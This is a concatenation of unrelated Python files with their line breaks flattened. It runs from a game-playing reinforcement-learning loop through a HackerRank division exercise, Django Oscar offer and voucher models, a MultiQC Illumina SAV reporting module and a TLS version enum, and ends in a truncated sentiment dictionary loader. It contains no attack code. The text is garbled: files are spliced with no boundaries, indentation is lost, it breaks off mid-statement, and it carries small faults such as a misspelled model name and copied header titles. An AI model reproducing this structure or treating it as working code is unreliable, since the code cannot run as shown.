ep_rew = 0 obs = env.reset() obs[0, 0, :], obs[2, 0, :] = 0, 0 [frame_stack.append(rgb_to_gry(obs, downsampling_ratio)) for ii in range(frame_stack_len)] [x_stack.append(np.random.randint(60, 80)) for ii in range(len(x_stack))] stacked_obs = np.asarray(frame_stack, dtype=np.uint8) done = False last_action, max_x = 0, 40 while not done: training_steps += 1 all_frame_rew = 0 for step in range(step_size): frame_rew = 0 action, action_val = agent.choose_action(stacked_obs, True) for f in range(frame_stack_len): if done: pass else: env.render() obs, reward, done, info = env.step(action) # Jump Including Action obs[0, 0, :] = float((last_action == 2) or (last_action == 5) or (last_action == 4)) # Right Including Action obs[2, 0, :] = float((last_action >=1) and (last_action <= 4)) reward += float(reward < 0) * 2 * reward frame_rew += reward / 2 frame_stack.append(rgb_to_gry(obs, downsampling_ratio)) if info['flag_get'] == True: frame_rew += 600 if info['x_pos'] > max_x: max_x = info['x_pos'] last_action = action x_stack.append(max_x) ep_rew += frame_rew all_frame_rew += frame_rew * (gamma ** (step_size - step - 1)) next_stacked_obs = np.asarray(frame_stack, dtype=np.uint8) agent.memory.store_transition(stacked_obs, action, all_frame_rew, next_stacked_obs, done, float(info['x_pos'])) if done: agent.memory.store_transition(stacked_obs, action, all_frame_rew, next_stacked_obs, done, float(info['x_pos'])) agent.update() stacked_obs = next_stacked_obs if len(set(x_stack)) == 1: done = True if training_steps % save_freq == 0: agent.save_agent(training_steps, exp_id) print(f"AGENT SAVED @{training_steps}") 0 ''' Title : Python: Division Subdomain : Introduction Domain : Python Author : Created : 28 September 2016 ''' from __future__ import division a = int(input()) b = int(input()) print (a // b) print (a / b)from decimal import Decimal import datetime from django.contrib.auth.models import User from django.db import models from django.utils.translation import ugettext as _ from django.core.exceptions import ValidationError from oscar.apps.offer.managers import ActiveOfferManager SITE, VOUCHER, USER, SESSION = ("Site", "Voucher", "User", "Session") class AbstractConditionalOffer(models.Model): u""" A conditional offer (eg buy 1, get 10% off) """ name = models.CharField(max_length=128) description = models.TextField(blank=True, null=True) # Offers come in a few different types: # (a) Offers that are available to all customers on the site. Eg a # 3-for-2 offer. # (b) Offers that are linked to a voucher, and only become available once # that voucher has been applied to the basket # (c) Offers that are linked to a user. Eg, all students get 10% off. The code # to apply this offer needs to be coded # (d) Session offers - these are temporarily available to a user after some trigger # event. Eg, users coming from some affiliate site get 10% off. TYPE_CHOICES = ( (SITE, "Site offer - available to all users"), (VOUCHER, "Voucher offer - only available after entering the appropriate voucher code"), (USER, "User offer - available to certain types of user"), (SESSION, "Session offer - temporary offer, available for a user for the duration of their session"), ) offer_type = models.CharField(_("Type"), choices=TYPE_CHOICES, default=SITE, max_length=128) condition = models.ForeignKey('offer.Condition') benefit = models.ForeignKey('offer.Benefit') # Range of availability. Note that if this is a voucher offer, then these # dates are ignored and only the dates from the voucher are used to determine # availability. start_date = models.DateField(blank=True, null=True) end_date = models.DateField(blank=True, null=True) # Some complicated situations require offers to be applied in a set order. priority = models.IntegerField(default=0, help_text="The highest priority offers are applied first") # We track some information on usage total_discount = models.DecimalField(decimal_places=2, max_digits=12, default=Decimal('0.00')) date_created = models.DateTimeField(auto_now_add=True) objects = models.Manager() active = ActiveOfferManager() # We need to track the voucher that this offer came from (if it is a voucher offer) _voucher = None class Meta: ordering = ['-priority'] abstract = True def __unicode__(self): return self.name def is_active(self, test_date=None): if not test_date: test_date = datetime.date.today() return self.start_date <= test_date and test_date < self.end_date def is_condition_satisfied(self, basket): return self._proxy_condition().is_satisfied(basket) def apply_benefit(self, basket): u""" Applies the benefit to the given basket and returns the discount. """ if not self.is_condition_satisfied(basket): return Decimal('0.00') return self._proxy_benefit().apply(basket, self._proxy_condition()) def set_voucher(self, voucher): self._voucher = voucher def get_voucher(self): return self._voucher def _proxy_condition(self): u""" Returns the appropriate proxy model for the condition """ return self.condition def _proxy_benefit(self): u""" Returns the appropriate proxy model for the benefit """ return self.benefit class AbstractCondition(models.Model): COUNT, VALUE, COVERAGE = ("Count", "Value", "Coverage") TYPE_CHOICES = ( (COUNT, _("Depends on number of items in basket that are in condition range")), (VALUE, _("Depends on value of items in basket that are in condition range")), (COVERAGE, _("Needs to contain a set number of DISTINCT items from the condition range")) ) range = models.ForeignKey('offer.Range') type = models.CharField(max_length=128, choices=TYPE_CHOICES) value = models.DecimalField(decimal_places=2, max_digits=12) class Meta: abstract = True def __unicode__(self): if self.type == self.COUNT: return u"Basket includes %d item(s) from %s" % (self.value, str(self.range).lower()) elif self.type == self.COVERAGE: return u"Basket includes %d distinct products from %s" % (self.value, str(self.range).lower()) return u"Basket includes %.2f value from %s" % (self.value, str(self.range).lower()) def consume_items(self, basket): pass def is_satisfied(self, basket): """ Determines whether a given basket meets this condition. This is stubbed in this top-class object. The subclassing proxies are responsible for implementing it correctly. """ return False class AbstractBenefit(models.Model): PERCENTAGE, FIXED, MULTIBUY, FIXED_PRICE = ("Percentage", "Absolute", "Multibuy", "Fixed price") TYPE_CHOICES = ( (PERCENTAGE, _("Discount is a % of the product's value")), (FIXED, _("Discount is a fixed amount off the product's value")), (MULTIBUY, _("Discount is to give the cheapest product for free")), (FIXED_PRICE, _("Get the products that meet the condition for a fixed price")), ) range = models.ForeignKey('offer.Range', null=True, blank=True) type = models.CharField(max_length=128, choices=TYPE_CHOICES) value = models.DecimalField(decimal_places=2, max_digits=12) # If this is not set, then there is no upper limit on how many products # can be discounted by this benefit. max_affected_items = models.PositiveIntegerField(blank=True, null=True, help_text="""Set this to prevent the discount consuming all items within the range that are in the basket.""") class Meta: abstract = True def __unicode__(self): if self.type == self.PERCENTAGE: desc = u"%s%% discount on %s" % (self.value, str(self.range).lower()) elif self.type == self.MULTIBUY: desc = u"Cheapest product is free from %s" % str(self.range) elif self.type == self.FIXED_PRICE: desc = u"The products that meet the condition are sold for %s" % self.value else: desc = u"%.2f discount on %s" % (self.value, str(self.range).lower()) if self.max_affected_items == 1: desc += u" (max 1 item)" elif self.max_affected_items > 1: desc += u" (max %d items)" % self.max_affected_items return desc def apply(self, basket, condition=None): return Decimal('0.00') def clean(self): # All benefits need a range apart from FIXED_PRICE if self.type != self.FIXED_PRICE and not self.range: raise ValidationError("Benefits of type %s need a range" % self.type) class AbstractRange(models.Model): u""" Represents a range of products that can be used within an offer """ name = models.CharField(_("Name"), max_length=128) includes_all_products = models.BooleanField(default=False) included_products = models.ManyToManyField('product.Item', related_name='includes', blank=True) excluded_products = models.ManyToManyField('product.Item', related_name='excludes', blank=True) classes = models.ManyToManyField('product.ItemClass', related_name='classes', blank=True) __included_product_ids = None __excluded_product_ids = None __class_ids = None class Meta: abstract = True def __unicode__(self): return self.name def contains_product(self, product): excluded_product_ids = self._excluded_product_ids() if product.id in excluded_product_ids: return False if self.includes_all_products: return True if product.item_class_id in self._class_ids(): return True included_product_ids = self._included_product_ids() return product.id in included_product_ids def _included_product_ids(self): if None == self.__included_product_ids: self.__included_product_ids = [row['id'] for row in self.included_products.values('id')] return self.__included_product_ids def _excluded_product_ids(self): if None == self.__excluded_product_ids: self.__excluded_product_ids = [row['id'] for row in self.excluded_products.values('id')] return self.__excluded_product_ids def _class_ids(self): if None == self.__class_ids: self.__class_ids = [row['id'] for row in self.classes.values('id')] return self.__class_ids class AbstractVoucher(models.Model): u""" A voucher. This is simply a link to a collection of offers Note that there are three possible "usage" models: (a) Single use (b) Multi-use (c) Once per customer """ name = models.CharField(_("Name"), max_length=128, help_text="""This will be shown in the checkout and basket once the voucher is entered""") code = models.CharField(_("Code"), max_length=128, db_index=True, unique=True, help_text="""Case insensitive / No spaces allowed""") offers = models.ManyToManyField('offer.ConditionalOFfer', related_name='vouchers', limit_choices_to={'offer_type': VOUCHER}) SINGLE_USE, MULTI_USE, ONCE_PER_CUSTOMER = ('Single use', 'Multi-use', 'Once per customer') USAGE_CHOICES = ( (SINGLE_USE, "Can only be used by one customer"), (MULTI_USE, "Can only be used any number of times"), (ONCE_PER_CUSTOMER, "Can be used once by each customer"), ) usage = models.CharField(_("Usage"), max_length=128, choices=USAGE_CHOICES, default=MULTI_USE) start_date = models.DateField() end_date = models.DateField() # Summary information num_basket_additions = models.PositiveIntegerField(default=0) num_orders = models.PositiveIntegerField(default=0) total_discount = models.DecimalField(decimal_places=2, max_digits=12, default=Decimal('0.00')) date_created = models.DateField(auto_now_add=True) class Meta: abstract = True get_latest_by = 'date_created' def __unicode__(self): return self.name def save(self, *args, **kwargs): self.code = self.code.upper() super(AbstractVoucher, self).save(*args, **kwargs) def is_active(self, test_date=None): u""" Tests whether this voucher is currently active. """ if not test_date: test_date = datetime.date.today() return self.start_date <= test_date and test_date < self.end_date def is_available_to_user(self, user=None): u""" Tests whether this voucher is available to the passed user. Returns a tuple of a boolean for whether it is successulf, and a message """ is_available, message = False, '' if self.usage == self.SINGLE_USE: is_available = self.applications.count() == 0 if not is_available: message = "This voucher has already been used" elif self.usage == self.MULTI_USE: is_available = True elif self.usage == self.ONCE_PER_CUSTOMER: if not user.is_authenticated(): is_available = False message = "This voucher is only available to signed in users" else: is_available = self.applications.filter(voucher=self, user=user).count() == 0 if not is_available: message = "You have already used this voucher in a previous order" return is_available, message def record_usage(self, order, user): u""" Records a usage of this voucher in an order. """ self.applications.create(voucher=self, order=order, user=user) class AbstractVoucherApplication(models.Model): u""" For tracking how often a voucher has been used """ voucher = models.ForeignKey('offer.Voucher', related_name="applications") # It is possible for an anonymous user to apply a voucher so we need to allow # the user to be nullable user = models.ForeignKey('auth.User', blank=True, null=True) order = models.ForeignKey('order.Order') date_created = models.DateField(auto_now_add=True) class Meta: abstract = True def __unicode__(self): return u"'%s' used by '%s'" % (self.voucher, self.user) #!/usr/bin/env python import glob import logging import os import re import xml.etree.ElementTree as ET from collections import OrderedDict from datetime import datetime from typing import Dict import interop import numpy import pandas as pd from interop import py_interop_plot from multiqc import config from multiqc.modules.base_module import BaseMultiqcModule from multiqc.plots import bargraph, heatmap, linegraph, scatter, table from multiqc.utils import mqc_colour # Initialise the main MultiQC logger log = logging.getLogger("multiqc") HEADERS = { "Error Rate": { "title": "Error Rate (%)", "description": "The calculated error rate, as determined by a PhiX spike-in", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Error Rate 35": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-35.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 50": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-50.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 75": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-75.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 100": { "title": "Error Rate 100 Cycles (%)", "description": "The calculated error rate for cycles 1-100.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "First Cycle Intensity": { "title": "Intensity Cycle 1", "description": "The average of the A channel intensity measured at the first cycle", }, "% Aligned": { "title": "Aligned (%)", "description": "Percentage of reads that aligned to the PhiX genome", "suffix": "%", "min": 0, "max": 100, "format": "{:,.0f}", # No decimal places please }, "% >= Q30": { "title": "% >= Q30", "description": "Percentage of reads with quality phred score of 30 or above", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "% Occupancy Proxy": { "title": "Occupancy Proxy (%)", # "description": "", "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "% Occupied": { "title": "Occupied (%)", "description": "The percentage of nanowells occupied by clusters, +/- 1 standard deviation.", "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Projected Yield G": { "title": "Projected Yield ({})".format(config.base_count_prefix), "description": "The expected number of bases sequenced ({} base pairs over all 'usable cycles'".format( config.base_count_desc ), "shared_key": "base_count", "modify": lambda x: (x * 1000000000.0) * config.base_count_multiplier, # number is already in gigabases "hidden": True, }, "Yield G": { "title": "Yield ({})".format(config.read_count_prefix), "description": "The number of bases sequenced ({} base pairs over all 'usable cycles'".format( config.base_count_desc ), "shared_key": "base_count", "modify": lambda x: (x * 1000000000.0) * config.base_count_multiplier, # number is already in gigabases }, "Cluster Count": { "title": "Clusters ({})".format(config.read_count_prefix), "description": "Number of clusters for each tile ({})".format(config.read_count_desc), "shared_key": "cluster_count", "modify": lambda x: x * config.read_count_multiplier, }, "Cluster Count Pf": { "title": "Clusters PF ({})".format(config.read_count_prefix), "description": "Number of clusters PF for each tile ({})".format(config.read_count_desc), "shared_key": "cluster_count", "modify": lambda x: x * config.read_count_multiplier, }, "% Pf": { "title": "Reads PF (%)", "description": "Percentage of clusters Passing Filter", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Density": { "title": "Density", "description": "The density of clusters (in thousands per mm2) detected by image analysis, +/- 1 standard deviation.", "hidden": True, }, "Density Pf": { "title": "Density PF", "description": "The density of clusters PF (in thousands per mm2) detected by image analysis, +/- 1 standard deviation.", "hidden": True, }, "Phasing": { "title": "Phasing", "description": "The value used by RTA for the percentage of molecules in a cluster for which sequencing falls behind (phasing) the current cycle within a read.", }, "Phasing Offset": { "title": "Phasing Offset", "description": "The best-fit offset of the phasing corrections, calculated from the entire read.", "hidden": True, }, "Phasing Slope": { "title": "Phasing Slope", "description": "The best-fit slope of the phasing corrections, calculated from the entire read.", "hidden": True, }, "Prephasing": { "title": "Prephasing", "description": "The value used by RTA for the percentage of molecules in a cluster for which sequencing jumps ahead (prephasing) the current cycle within a read.", }, "Prephasing Offset": { "title": "Prephasing Offset", "description": "The best-fit offset of the prephasing corrections, calculated from the entire read.", "hidden": True, }, "Prephasing Slope": { "title": "Prephasing Slope", "description": "The best-fit slope of the prephasing corrections, calculated from the entire read.", "hidden": True, }, "Reads": { "title": "{} Reads".format(config.read_count_prefix), "description": "The number of reads ({})".format(config.read_count_desc), "shared_key": "read_count", "modify": lambda x: x * config.read_count_multiplier, }, "Reads Pf": { "title": "{} PF Reads".format(config.read_count_prefix), "description": "The number of passing filter reads ({})".format(config.read_count_desc), "shared_key": "read_count", "modify": lambda x: x * config.read_count_multiplier, }, "Tile Count": {"title": "Tiles", "description": "The number of tiles per lane.", "hidden": True,}, "Total Pf Reads": { "title": "{} PF Reads".format(config.read_count_prefix), "description": "The total number of passing filter reads for this lane ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Total Reads": { "title": "{} Reads".format(config.read_count_prefix), "description": "The total number of reads for this lane ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Mapped Reads Cv": { "title": "CV", "description": "The coefficient of variation for the number of counts across all indexes.", "format": "{:,.2f}", # 2 decimal places please }, "Max Mapped Reads": { "title": "{} Max Mapped Reads".format(config.read_count_prefix), "description": "The highest representation for any index ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Min Mapped Reads": { "title": "{} Min Mapped Reads".format(config.read_count_prefix), "description": "The lowest representation for any index ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Total Fraction Mapped Reads": {"hidden": True}, "Fraction Mapped": {"hidden": True}, "Index1": {"title": "Index 1 (I7)", "description": "The sequence for the first Index Read.",}, "Index2": {"title": "Index 2 (I5)", "description": "The sequence for the second Index Read",}, "Project Name": {"title": "Project Name", "description": "Sample Project Name",}, "Sample Id": {"title": "Sample ID", "description": "The Sample ID given in the SampleSheet",}, } class SAV(BaseMultiqcModule): """ Generate SAV tables an Graphs including: - GRAPH: Intensity/Cycle/Channel - GRAPH: Clusters/Lane - GRAPH: Qscore Heatmap - GRAPH: Qscore Histogram - GRAPH: %Occ/%PF - TABLE: Run Summary """ def __init__(self): super(SAV, self).__init__( name="Illumina SAV", anchor="sav", info=" - Sequencing Metrics from Illumina sequencers", ) # Set variables run_info_xml = "" run_parameters_xml = "" illumina_dir = "" # Check if required files are found for f in self.find_log_files("SAV/xml"): if re.match(r".*[Rr]un[Ii]nfo\.xml", f["fn"]): run_info_xml = os.path.join(f["root"], f["fn"]) if re.match(r".*[Rr]un[Pp]arameters\.xml", f["fn"]): run_parameters_xml = os.path.join(f["root"], f["fn"]) # Assume single run for now if (os.path.dirname(run_info_xml) == os.path.dirname(run_parameters_xml)) and len( glob.glob(os.path.join(os.path.dirname(run_info_xml), "InterOp/*.bin")) ) > 0: illumina_dir = os.path.dirname(run_info_xml) else: log.debug("Skipping MultiQC_SAV, required files were not found or not in the right structure.") return None self.set_run_info(run_info_xml) self.load_metrics(illumina_dir) self.summary_qc() self.q_summary() self.imaging_qc() def load_metrics(self, illumina_dir) -> None: log.info("Loading Run Metrics") self.run_metrics = interop.read(run=illumina_dir, valid_to_load=interop.load_imaging_metrics(), finalize=True,) ############# # RUN INFO ############# def set_run_info(self, run_info_xml: str) -> None: log.info("Loading Run Info") run_info_xml = ET.parse(run_info_xml) root = run_info_xml.getroot() for run in root: run_number = run.attrib["Number"] flowcell = [fc.text for fc in run.iter("Flowcell")][0] instrument_id = [fc.text for fc in run.iter("Instrument")][0] run_date = [fc.text for fc in run.iter("Date")][0] try: parsed_run_date = datetime.strftime(datetime.strptime(run_date, "%y%m%d"), "%d-%m-%Y") except ValueError: parsed_run_date = datetime.strftime(datetime.strptime(run_date, "%m/%d/%Y %I:%M:%S %p"), "%d-%m-%Y") read_info = "" for read in run.iter("Read"): key = ( f"Read {read.attrib['Number']} (I)" if read.attrib["IsIndexedRead"] == "Y" else f"Read {read.attrib['Number']}" ) read_info += f"
  • {key}: {read.attrib['NumCycles']} Cycles
  • " self.add_section( name="Run Info", anchor="sav-run-info", content=f"""

    Instrument

    • Instrument ID: {instrument_id}
    • Flowcell: {flowcell}
    • Run Number: {run_number}
    • Run Date: {parsed_run_date}

    Settings

      {read_info}
    """, ) ############# # SUMMARY QC ############# def summary_qc(self) -> None: """ Generate MultiQC sections related to Summary tables :return: None """ log.info("Gathering Read summary metrics") summary_read = pd.DataFrame(interop.summary(self.run_metrics, level="Read")) summary_nonindex = pd.DataFrame(interop.summary(self.run_metrics, level="NonIndex")) summary_total = pd.DataFrame(interop.summary(self.run_metrics, level="Total")) self.add_section( name="Summary Read Metrics", anchor="sav-read-summary", description="Summary metrics per Read", plot=self.read_summary_table(self.parse_read_summary(summary_read, summary_nonindex, summary_total)), ) log.info("Gathering Lane summary metrics") summary_lane = pd.DataFrame(interop.summary(self.run_metrics, level="Lane")) self.add_section( name="Summary Lane Metrics", anchor="sav-lane-summary", description="Summary metrics per Lane per Read", plot=self.lane_summary_table(self.parse_lane_summary(summary_lane)), ) # - GRAPH: Clusters/Lane log.info("Generating 'Clusters/Lane' plot") self.add_section( name="Clusters/Reads per Lane", anchor="sav-clusters-lane", description="Total Cluster/Read count per Lane", plot=self.clusters_lane_plot(self.parse_lane_summary(summary_lane)), ) def parse_read_summary( self, read_metrics: pd.DataFrame, non_index_metrics: pd.DataFrame, total_metrics: pd.DataFrame ) -> Dict: """ Parse "Read Summary" table DataFrame :return: Dict containing table data """ table_data: dict = self._parse_reads(read_metrics) for read, data in non_index_metrics.iterrows(): table_data["Non-Indexed"] = data.to_dict() for read, data in total_metrics.iterrows(): table_data["Total"] = data.to_dict() return table_data def read_summary_table(self, data: pd.DataFrame) -> table.plot: """ Format "Read Summary" data dict and add plot config. :return: table object to be used in a MultiQC section """ headers = {header: HEADERS[header] for header in interop.summary_columns(level="Lane")} table_config = { "namespace": "SAV", "id": "sav-read-metrics-summary-table", "col1_header": "Read", } return table.plot(data, headers, table_config) def parse_lane_summary(self, data: pd.DataFrame) -> Dict: """ Parse "Lane Summary" table DataFrame :return: Dict containing table data """ lanes = data.groupby("Lane") table_data: dict = {} for lane, reads in lanes: lane_data = {} reads_dict = self._parse_reads(reads, key_prefix=f"Lane {lane}") table_data.update(reads_dict) return table_data def lane_summary_table(self, data: Dict) -> table.plot: """ Format "Lane Summary" data dict and add plot config. :return: table object to be used in a MultiQC section """ headers = {header: HEADERS[header] for header in interop.summary_columns(level="Lane")} table_config = { "namespace": "SAV", "id": "sav-lane-metrics-summary-table", "col1_header": "Lane - Read", } return table.plot(data, headers, table_config,) def clusters_lane_plot(self, data: Dict) -> bargraph.plot: """ Format "Clusters per Lane" data dict and add plot config. :return: bar plot object to be used in a MultiQC section """ cluster_data = {} read_data = {} for key, value in data.items(): lane = int(value["Lane"]) if f"Lane {lane}" not in cluster_data: cluster_data[f"Lane {lane}"] = { "clusters": value["Cluster Count"], "clusters_pf": value["Cluster Count Pf"], "clusters_diff": value["Cluster Count"] - value["Cluster Count Pf"], } read_data[f"Lane {lane}"] = { "reads": value["Reads"], "reads_pf": value["Reads Pf"], "reads_diff": value["Reads"] - value["Reads Pf"], } else: cluster_data[f"Lane {lane}"]["clusters"] += value["Cluster Count"] cluster_data[f"Lane {lane}"]["clusters_pf"] += value["Cluster Count Pf"] cluster_data[f"Lane {lane}"]["clusters_diff"] += value["Cluster Count"] - value["Cluster Count Pf"] read_data[f"Lane {lane}"]["reads"] += value["Reads"] read_data[f"Lane {lane}"]["reads_pf"] += value["Reads Pf"] read_data[f"Lane {lane}"]["reads_diff"] += value["Reads"] - value["Reads Pf"] cats = [OrderedDict(), OrderedDict()] cats[0]["clusters_pf"] = {"name": "Clusters PF"} cats[0]["clusters_diff"] = {"name": "Clusters not PF"} cats[1]["reads_pf"] = {"name": "Reads PF"} cats[1]["reads_diff"] = {"name": "Reads not PF"} plot_config = { "id": "sav-summary-clusters-reads-lane-plot", "title": "SAV: Cluster/Reads per Lane", "data_labels": ["Clusters", "Reads"], "ylab": "Lane", } return bargraph.plot([cluster_data, read_data], cats, plot_config) def _parse_reads(self, reads_df: pd.DataFrame, key_prefix: str = None) -> Dict: """ Utility function to parse a "Reads" dataframe to dict :return: Reads dict """ reads_dict = {} reads_df = reads_df.set_index("ReadNumber") for read, data in reads_df.iterrows(): key = f"Read {read}" + " (I)" if data["IsIndex"] == 89 else f"Read {read}" if key_prefix: key = f"{key_prefix} - {key}" reads_dict[key] = data.drop("IsIndex").to_dict() return reads_dict ############# # Q SUMMARY ############# def q_summary(self) -> None: """ Generate MultiQC sections related to Qscore :return: None """ # - GRAPH: Qscore Heatmap log.info("Generating 'Qscore Heatmap' plot") self.add_section( name="Qscore Heatmap", anchor="sav-qscore-heatmap", description="The Qscore Heat Map provides an overview of quality scores across cycles.", plot=self.qscore_heatmap_plot(), ) # - GRAPH: Qscore Histogram log.info("Generating 'Qscore Histogram' plot") self.add_section( name="Qscore Histogram", anchor="sav-qscore-histogram", description="Qscore Histogram graphs the number of bases by quality score. The quality score is cumulative for the current cycle. Only bases from reads that pass the quality filter are included.", plot=self.qscore_histogram_plot(), ) def qscore_heatmap_plot(self) -> heatmap.plot: """ Get heatmap data from run_metrics object Note: this function has *much* room for improvement, but we need to wait for further developments in the InterOp library. In the mean time, this will have to do. :return: heatmap plot object to be used in a MultiQC section """ options = py_interop_plot.filter_options(self.run_metrics.run_info().flowcell().naming_method()) rows = py_interop_plot.count_rows_for_heatmap(self.run_metrics) cols = py_interop_plot.count_columns_for_heatmap(self.run_metrics) dataBuffer = numpy.zeros((rows, cols), dtype=numpy.float32) data = py_interop_plot.heatmap_data() try: py_interop_plot.plot_qscore_heatmap(self.run_metrics, options, data, dataBuffer.ravel()) except py_interop_plot.invalid_filter_option: pass plot_data = dataBuffer.transpose().tolist() # cycles x_cats = list(range(0, cols)) # qscore y_cats = list(range(0, rows)) plot_config = { "id": "sav-qscore-heatmap-plot", "title": "SAV: Qscore Heatmap", "xTitle": "Cycle", "yTitle": "Qscore", "square": False, "colstops": [ [0, "#FFFFFF"], [0.1, "#1a9850"], [0.2, "#66bd63"], [0.3, "#a6d96a"], [0.4, "#d9ef8b"], [0.5, "#ffffbf"], [0.6, "#fee08b"], [0.7, "#fdae61"], [0.8, "#f46d43"], [0.9, "#d73027"], [1, "#a50026"], ], } return heatmap.plot(plot_data, x_cats, y_cats, plot_config) def qscore_histogram_plot(self) -> linegraph.plot: """ Get histogram data from run_metrics object Note: this function has *much* room for improvement, but we need to wait for further developments in the InterOp library In the mean time, this will have to do. :return: linegraph plot object to be used in a MultiQC section """ bar_data = py_interop_plot.bar_plot_data() options = py_interop_plot.filter_options(self.run_metrics.run_info().flowcell().naming_method()) py_interop_plot.plot_qscore_histogram(self.run_metrics, options, bar_data) hist = {} qscore = [] reads = [] binsize = [] for i in range(bar_data.size()): qscore = [bar_data.at(i).at(j).x() for j in range(bar_data.at(i).size())] reads = [bar_data.at(i).at(j).y() for j in range(bar_data.at(i).size())] binsize = [bar_data.at(i).at(j).width() for j in range(bar_data.at(i).size())] i = 0 while i < len(qscore): j = 0 while j < binsize[i]: hist.update({qscore[i] + j: reads[i]}) j += 1 i += 1 plot_data = {bar_data.title(): hist} plot_config = { "id": "sav-qscore-histogram-plot", "title": "SAV: Qscore Histogram", "xlab": "Qscore", "ylab": "Reads (Billion)", } return linegraph.plot(plot_data, plot_config) ############# # IMAGING QC ############# def imaging_qc(self) -> None: """ Generate MultiQC sections related to Imaging. This includes: - Plot: Intensity/Cycle/Channel - Plot: %Occ/%PF :return: None """ log.info("Gathering Imaging metrics") imaging = pd.DataFrame(interop.imaging(self.run_metrics)) plot_data = self.parse_imaging_table(imaging) # - GRAPH: Intensity/Cycle/Channel if len(plot_data.get("intensity_cycle", [])) > 0: log.info("Generating 'Intensity per Cycle' plot") self.add_section( name="Intensity per Cycle", anchor="sav-intensity-cycle", description="Intensity by color and cycle of the 90% percentile of the data for each tile", plot=self.intensity_cycle_plot(plot_data.get("intensity_cycle", [])), ) # - GRAPH: %Occ/%PF log.info("Generating '% PF vs % Occupied' plot") if len(plot_data.get("occ_vs_pf", [])) > 0: self.add_section( name="% PF vs % Occupied", anchor="sav-imaging-pf-vs-occ", description="% Clusters passing filter vs % Wells Occupied", plot=self.occ_vs_pf_plot(plot_data.get("occ_vs_pf", [])), ) def parse_imaging_table(self, data: pd.DataFrame) -> Dict: """ Parse full imaging table DataFrame :return: Dict containing data for intesity per cylce plot (key:"intensity_cycle") and %occ vs %pf plot (key: ""occ_vs_pf") """ # set color scale for occ_pf cscale = mqc_colour.mqc_colour_scale() colors = cscale.get_colours("Dark2") per_lane = data.groupby("Lane") occ_pf = {} intensity_cycle = {} for lane, lane_data in per_lane: lane = int(lane) # prep intensity_cycle CHANNEL_SETS = [{"P90/RED", "P90/GREEN"}, {"P90/Red", "P90/Green"}, {"P90/G", "P90/A", "P90/T", "P90/C"}] channels = set() for channel_set in CHANNEL_SETS: if channel_set.issubset(lane_data.columns): channels = channel_set # prep occ_pf if not f"Lane {lane}" in occ_pf: occ_pf[f"Lane {lane}"] = [] prev_occ = 0 prev_pf = 0 # parse imaging table lane for _, row in lane_data.iterrows(): # intensity_cyle cycle = int(row["Cycle"]) for channel in channels: intensity = float(row[channel]) if not channel in intensity_cycle: intensity_cycle[channel] = {} if not cycle in intensity_cycle[channel]: intensity_cycle[channel].update({cycle: 0}) intensity_cycle[channel][cycle] += intensity # occ_pf if {"% Occupied", "% Pass Filter"}.issubset(lane_data.columns): occ = float(row["% Occupied"]) pf = float(row["% Pass Filter"]) if occ != prev_occ or pf != prev_pf: prev_occ = occ prev_pf = pf occ_pf[f"Lane {lane}"].append({"x": occ, "y": pf, "color": colors[lane]}) else: occ_pf = {} return {"intensity_cycle": intensity_cycle, "occ_vs_pf": occ_pf} def intensity_cycle_plot(self, data: Dict) -> linegraph.plot: """ Format Intensity per Cycle data dict and add plot config. :return: linegraph plot object to be used in a MultiQC section """ # get keys from data key_color_dict = {} for key in data: if re.match(r"\w+/red", key, re.IGNORECASE): key_color_dict[key] = "red" elif re.match(r"\w+/green", key, re.IGNORECASE): key_color_dict[key] = "green" elif re.match(r"\w+/G", key): key_color_dict[key] = "blue" elif re.match(r"\w+/A", key): key_color_dict[key] = "black" elif re.match(r"\w+/T", key): key_color_dict[key] = "green" elif re.match(r"\w+/C", key): key_color_dict[key] = "red" plot_config = { "id": "sav-intensity-vs-cycle-plot", "title": "SAV: Intensity per cycle", "xlab": "Cycle", "ylab": "Intensity", "colors": key_color_dict, } return linegraph.plot(data, plot_config) def occ_vs_pf_plot(self, data: Dict) -> scatter.plot: """ Format %Occ vs %PF data dict and add plot config. :return: scatter plot object to be used in a MultiQC section """ plot_config = { "id": "sav-pf-vs-occ-plot", "title": "SAV: % Passing Filter vs % Occupied", "xlab": "% Occupied", "ylab": "% Passing Filter", "xmin": 0, "xmax": 100, "ymin": 0, "ymax": 100, } return scatter.plot(data, plot_config) from .enum_props import EnumProps from ..const import tls, dtls class SSlVersions(EnumProps): def __init__(self, ssl_versions=None, is_dtls=True): self.is_dtls = is_dtls if self.is_dtls: self.EnumClass = dtls.ProtocolVersion self.supported = [ dtls.ProtocolVersion.DTLS_1_2.name ] else: self.EnumClass = tls.ProtocolVersion self.supported = [ tls.ProtocolVersion.TLS_1_2.name ] super(SSlVersions, self).__init__(ssl_versions) pass sentiment/basedict/LoadDict.py1-10 # -*- coding:utf-8 -*- """ ------------------------------------------------- File Name: LoadDict Description: Author: Miller date: 2017/9/19 0019 ------------------------------------------------- """ __author__ = 'Miller' import pandas as pd class LoadDict: def __init__(self): pass @staticmethod def load_dict(): negdict = [] posdict = [] notdict = [] plusdict = [] file = pd.read_csv('../../data/sentiment/dict/negdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): negdict.append(file[0][i]) file = 